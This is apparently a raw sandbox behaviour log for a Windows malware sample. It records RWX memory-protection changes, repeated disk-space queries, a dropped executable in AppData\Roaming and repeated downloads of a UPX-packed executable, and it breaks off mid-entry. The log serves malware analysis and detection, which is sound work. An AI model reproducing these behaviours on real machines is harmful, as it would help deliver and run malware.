process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x752e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76e01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75931000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74460000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x744f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74101000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x740f1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935745024
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935728640
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935253504
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935716352
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935245312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935699968
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935237120
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935683584
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935671296
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935302656
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935814656
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935822848
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935802368
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935810560
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935790080
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935798272
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935716352
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935847424
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935872000
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935360000
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935855616
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935880192
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935843328
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935867904
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935855616
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935818752
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935843328
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935831040
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935818752
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935806464
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935769600
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935794176
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935757312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935781888
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935220736
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935245312
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935208448
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935233024
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935196160
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9935220736
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Roaming\XsvnGpYsBj.exe
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:45 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 804
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:46 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 820
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:47 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 276
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:47 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:48 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:48 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 276
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:49 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:50 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:46:50 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:51 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:52 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:54 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:54 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:46:55 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 820
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:56 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:57 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:57 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:58 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:01 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:02 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:05 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:11 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:12 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

